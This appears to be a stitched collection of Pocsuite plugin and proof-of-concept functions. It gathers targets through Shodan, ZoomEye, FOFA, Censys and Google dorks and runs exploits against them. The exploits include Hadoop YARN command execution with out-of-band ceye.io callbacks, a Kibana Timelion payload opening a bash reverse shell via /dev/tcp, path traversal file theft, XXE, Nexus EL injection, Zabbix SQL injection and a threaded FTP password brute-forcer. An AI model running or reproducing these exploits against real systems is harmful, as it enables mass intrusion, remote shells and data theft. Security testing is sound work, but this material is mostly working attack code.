def init(self): info_msg = "[PLUGIN] try fetch targets from CIDR..." logger.info(info_msg) cidr_set = set() if "CIDR" in os.environ: cidr_set.add(os.environ.get("CIDR")) elif conf.url: for i in conf.url: cidr_set.add(i) conf.url = [] else: cidr_text = input("Please input CIDR address:") cidr_set.add(cidr_text) count = 0 for i in cidr_set: try: network = ip_network(i, strict=False) for host in network.hosts(): self.add_target(host.exploded) count += 1 except ValueError: logger.error("[PLUGIN] error format from " + i) info_msg = "[PLUGIN] get {0} target(s) from CIDR".format(count) logger.info(info_msg)
def init(self): self.init_zoomeye_api() dork = None if conf.dork_zoomeye: dork = conf.dork_zoomeye else: dork = conf.dork if not dork: msg = "Need to set up dork (please --dork or --dork-zoomeye)" raise PocsuitePluginDorkException(msg) info_msg = "[PLUGIN] try fetch targets from zoomeye with dork: {0}".format( dork) logger.info(info_msg) targets = self.zoomeye.search(dork, conf.max_page, resource=conf.search_type) count = 0 if targets: for target in targets: if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from zoomeye".format(count) logger.info(info_msg)
def _verify(self): result = {} payload = random_str(16) + '.6eb4yw.ceye.io' cmd = 'ping ' + payload try: if self.url[-1] == '/': url1 = self.url + 'ws/v1/cluster/apps/new-application' url2 = self.url + 'ws/v1/cluster/apps' else: url1 = self.url + '/' + 'ws/v1/cluster/apps/new-application' url2 = self.url + '/' + 'ws/v1/cluster/apps' resp = requests.post(url=url1) app_id = resp.json()['application-id'] data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '%s' % cmd, }, }, 'application-type': 'YARN', } attack = requests.post( url=url2, json=data ) res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns') if payload in res: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result)
def init(self): self.init_fofa_crawler() dork = None if conf.dork_fofac: dork = conf.dork_fofac else: dork = conf.dork if not dork: msg = "Need to set up dork (please --dork or --dork-fofac)" raise PocsuitePluginDorkException(msg) if kb.comparison: kb.comparison.add_dork("Fofac", dork) info_msg = "[PLUGIN] try fetch targets from fofa with dork: {0}".format( dork) logger.info(info_msg) targets = self.fofac.search(dork) count = 0 if targets: for target in targets: if kb.comparison: kb.comparison.add_ip(target, "Fofa") if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from FOfac".format(count) logger.info(info_msg)
def _attack(self): result = {} try: Flag_error = "This file does not exist in JobManager log dir" if self.get_option("filename"): attack_filename = self.get_option("filename").replace( '/', '\\\\') else: attack_filename = 'App\\Common\\Conf\\db.php' logger.info("下载文件为:" + attack_filename) attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip' attack_url = self.url + attack_payload logger.info(attack_url) cookies = {'PHPSESSID': self.get_option("PHPSESSID")} attack_res = requests.get(attack_url, cookies=cookies, verify=False) if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode( ): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = attack_url result['VerifyInfo']['Payload'] = attack_payload result['VerifyInfo'][ 'File_Content'] = '\n' + attack_res.content.decode() except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} CEye_main = CEye(token=self.token) ceye_subdomain = CEye_main.getsubdomain() random_uri = random_str(16) logger.info("random_url为:%s" % random_uri) verify_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% xxe SYSTEM "http://%s/%s"> %%xxe; ]>""" % (ceye_subdomain,random_uri) logger.warn(verify_payload) veri_url = self.url logger.warn(veri_url) headers = { "Content-Type": "text/xml", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "SOAPAction": "aaa" } try: resp = requests.post(veri_url,data=verify_payload,headers=headers) if CEye_main.verify_request(random_uri): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def init(self): debug_msg = "[PLUGIN] file_record plugin init..." logger.debug(debug_msg) logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename)) if os.path.exists(self.filename): raise Exception("The {} has existed".format(self.filename)) self.file = open(self.filename, 'a+')
def init(self): self.init_shodan_api() dork = None if conf.dork_shodan: dork = conf.dork_shodan else: dork = conf.dork if not dork: msg = "Need to set up dork (please --dork or --dork-shodan)" raise PocsuitePluginDorkException(msg) if conf.dork_b64: import base64 dork = str(base64.b64decode(dork), encoding="utf-8") if kb.comparison: kb.comparison.add_dork("Shodan", dork) info_msg = "[PLUGIN] try fetch targets from shodan with dork: {0}".format(dork) logger.info(info_msg) targets = self.shodan.search(dork, conf.max_page, resource=conf.search_type) count = 0 if targets: for target in targets: if kb.comparison: kb.comparison.add_ip(target, "Shodan") if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from shodan".format(count) logger.info(info_msg)
def init(self): self.init_censys_api() dork = None if conf.dork_censys: dork = conf.dork_censys else: dork = conf.dork if not dork: msg = "Need to set up dork (please --dork or --dork-censys)" raise PocsuitePluginDorkException(msg) if conf.dork_b64: import base64 dork = str(base64.b64decode(dork),encoding = "utf-8") if kb.comparison: kb.comparison.add_dork("Censys", dork) info_msg = "[PLUGIN] try fetch targets from censys with dork: {0}".format(dork) logger.info(info_msg) search_type = conf.search_type if search_type == "web": search_type = "websites" else: search_type = "ipv4" targets = self.censys.search(dork, conf.max_page, resource=search_type) count = 0 if targets: for target in targets: if kb.comparison: kb.comparison.add_ip(target, "Censys") if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from Censys".format(count) logger.info(info_msg)
def init(self): self.google = Google() dork = None if conf.dork_google: dork = conf.dork_google else: dork = conf.dork if not dork: msg = "Need to set up dork (please --dork or --dork-google)" raise PocsuitePluginDorkException(msg) if kb.comparison: kb.comparison.add_dork("Google", dork) info_msg = "[PLUGIN] try fetch targets from google with dork: {0}".format( dork) logger.info(info_msg) targets = self.google.search(dork) count = 0 tmp = [] if targets: for target in targets: url = urlparse(target) if url.scheme + "://" + url.netloc != 'https://www.google.com': tmp.append(url.scheme + "://" + url.netloc) targets = list(set(tmp)) for target in targets: if kb.comparison: kb.comparison.add_ip(target, "Google") if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from google".format(count) logger.info(info_msg)
def task_thread(): while not task_queue.empty(): host, port, username, password = task_queue.get() logger.info('try burst {}:{} use username:{} password:{}'.format( host, port, username, password)) if ftp_login(host, port, username, password): with task_queue.mutex: task_queue.queue.clear() result_queue.put((username, password))
def test_EL(self, p_resp): d = p_resp.json() result = d[0]['message'] logger.info(result) try: if str(self.ran_sum) in result: return True except Exception: return False
def test_EL(self, p_resp): d = p_resp.json() result = d['result']['errors']['roles'] logger.info(result) try: if str(self.ran_sum) in result: return True except Exception: return False
def _verify(self): result={} vul_url = self.url target_url = vul_url + "/service/extdirect" j = { "action":"coreui_User", "method":"create", "data": [ { "userId": "shadowsock5", "firstName": "77", "lastName": "ss", "password": "******", "email": "*****@*****.**", "status": "active", "roles": [ "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}" ] } ], "type":"rpc","tid":4} resp = None # 返回的响应 l_auth_headers = self.get_auth_headers() for auth_header in l_auth_headers: # 将auth请求头更新到headers中 self.headers.update(auth_header) # 更新CSRF token self.headers.update(self.h) try: # 发起payload请求 resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'}) if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式 result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) return self.save_output(result) except json.decoder.JSONDecodeError as e: if resp.status_code == 401: pass #print("认证失败") else: logger.info("json解析失败") # 失败了可能只是密码错误,继续下一个密码尝试 continue except Exception as e: logger.error(e) raise e
def init_zoomeye_api(self): self.zoomeye = ZoomEye(username=conf.login_user, password=conf.login_pass) if self.zoomeye.get_resource_info(): info_msg = "[PLUGIN] ZoomEeye search limit {0}".format( self.zoomeye.resources) logger.info(info_msg) else: info_msg = "[PLUGIN] ZoomEye login faild" logger.error(info_msg)
def _verify(self): # 验证代码 result = {} output = Output(self) kibana_path = self.url + "/app/kibana" path1 = self.url + "/app/timelion" print(path1) path2 = self.url + "/api/timelion/run" payload = { "sheet": [ ".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"bash -i >& " "/dev/tcp/" + self.get_option("ncip") + "/" + self.get_option("ncport") + " 0>&1\");process.exit()//')\n.props(" "label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')" ], "time": { "from": "now-15m", "to": "now", "mode": "quick", "interval": "auto", "timezone": "Asia/Shanghai" } } resp = requests.get(kibana_path, verify=False, timeout=20) kbn_version = '' try: kbn_version = resp.headers['kbn-version'] except Exception as e: logger.info(e) header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", 'Accept': 'application/json, text/plain, */*', "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", 'Connection': 'close', 'kbn-version': kbn_version, 'Content-Type': 'application/json;charset=UTF-8' } respose2 = requests.post(path2, headers=header, data=json.dumps(payload), verify=False, timeout=30) # print(respose2.status_code) if respose2.status_code == 200 and 'invokeTime' in respose2.text: # result是返回结果 result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Referer'] = "" return self.parse_output(result)
def _verify(self): result = {} try: ip = self.url.split('//')[1] port = int(self.get_option('port')) or 1099 if self.check(ip, port): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = ip result['VerifyInfo']['Info'] = 'the target exist vulnerability' except Exception as e: logger.info(e) return self.parse_output(result)
def _verify(self): result={} vul_url = self.url target_url = vul_url + "/service/rest/beta/repositories/go/group" j = { "name": "internal", "online": "true", "storage": { "blobStoreName": "default", "strictContentTypeValidation": "true" }, "group": { "memberNames": [ "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}" ] } } resp = None # 返回的响应 l_auth_headers = self.get_auth_headers() for auth_header in l_auth_headers: # 将auth请求头更新到headers中 self.headers.update(auth_header) # 更新CSRF token self.headers.update(self.h) try: # 发起payload请求 resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'}) if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式 result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['Credentials'] = auth_header return self.save_output(result) return self.save_output(result) except json.decoder.JSONDecodeError as e: if resp.status_code == 401: pass #print("认证失败") else: logger.info("json解析失败") # 失败了可能只是密码错误,继续下一个密码尝试 continue except Exception as e: logger.error(e) raise e
def _verify(self): result = {} try: host = self.url.split('//')[1] port = 443 if self.check_heardbeat(host=host.encode(), port=port): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = host result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host except Exception as e: logger.info(e) return self.parse_output(result)
def _verify(self): result = {} try: url = self.url + "/info" res = requests.get(url) if res.status_code == 200 and res.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Payload'] = url except Exception as e: logger.info(e) return self.parse_ouput(result)
def init(self): _pocs = [] for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH): files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files) _pocs.extend(map(lambda x: os.path.join(root, x), files)) for f in _pocs: if self.add_poc_from_file(f): info_msg = "[PLUGIN] load PoC script '{0}' from seebug success".format(f) else: info_msg = "[PLUGIN] load PoC script '{0}' from seebug failed".format(f) logger.info(info_msg)
def _verify(self): result = {} payload = 'latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1' try: url = self._get_url + payload response = requests.get(url) if 'web.latest.toggle' in response.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result)
def _verify(self): result = {} payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31' try: target = self._get_url + payload response = requests.get(url=target, headers=self._headers) if 'Dashboard' in response.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result)
def _verify(self): result = {} vul_url = self.url host, port = url2ip(vul_url, True) logger.info("检查端口开放情况...") # 端口都不开放就不浪费时间了 if not self.is_port_open(host, port): logger.info("端口不开放! 退出!") return logger.info("端口开放... 继续") target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format( vul_url) try: resp = req.get(target_url, verify=False) except Exception as e: print(e) raise e if resp.status_code == 405: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) logger.info(resp) return self.save_output(result)
def _attack(self): result = {} payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml" vul_url = self.url + payload headers = { "Content-Type": "application/x-www-form-urlencoded" } logger.info("url: {}".format(vul_url)) r = requests.get(vul_url, headers=headers) if r.status_code == 200: result['ShellInfo'] = {} result['ShellInfo']['Content'] = r.text return self.parse_output(result)
def ftp_burst(host, port): if not port_check(host, port): return if anonymous_login(host, port): logger.info('try burst {}:{} use username:{} password:{}'.format( host, port, 'anonymous', '<empty>')) result_queue.put(('anonymous', '<empty>')) return try: task_init(host, port) run_threads(4, task_thread) except Exception: pass
def _verify(self): result = {} headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36', } log_path_list = { '3': ['/Runtime/Logs/', '/App/Runtime/Logs/', '/Application/Runtime/Logs/Admin/', '/Application/Runtime/Logs/Home/', '/Application/Runtime/Logs/'], '5': ['/runtime/log/'], } for temppath in log_path_list['3']: filename_list=self.getTPLogFilename(3) for filename in filename_list: logpath=temppath+filename vulurl = "{}{}".format( self.url.rstrip('/'), logpath) logger.info("Scan {}".format(vulurl)) try: resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False) if "INFO" in resp.text and resp.status_code==200: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vulurl return self.parse_attack(result) except Exception as e: logger.error("connect target '{} failed!'".format(vulurl)) pass for temppath in log_path_list['5']: filename_list=self.getTPLogFilename(5) for filename in filename_list: logpath=temppath+filename vulurl = "{}{}".format( self.url.rstrip('/'), logpath) logger.info("Scan {}".format(vulurl)) try: resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False) if "INFO" in resp.text and resp.status_code==200: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vulurl return self.parse_attack(result) except Exception as e: logger.error("connect target '{} failed!'".format(vulurl)) pass return self.parse_attack(result)
def _sql_inject(self, sql): payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + parse.quote( sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" if self.url[-1] == '/': url = self.url + payload else: url = self.url + '/' + payload try: reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") response = requests.get(url, timeout=10) result = reg.findall(response.text) if result: return result[0] except Exception as e: logger.info(e) return False
def _verify(self): result = {} payload = 'ws_utc/resources/setting/options/general' try: if self.url[-1] == '/': url = self.url + payload else: url = self.url + '/' + payload response = requests.get(url=url, headers=self._headers) if response.status_code != 404: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result)
def init(self): r = self.get_redis() if r: key = 'pocsuite_target' info_msg = "[PLUGIN] try fetch targets from redis..." logger.info(info_msg) targets = r.get(key) count = 0 if targets: for target in targets: if self.add_target(target): count += 1 info_msg = "[PLUGIN] get {0} target(s) from redis".format(count) logger.info(info_msg)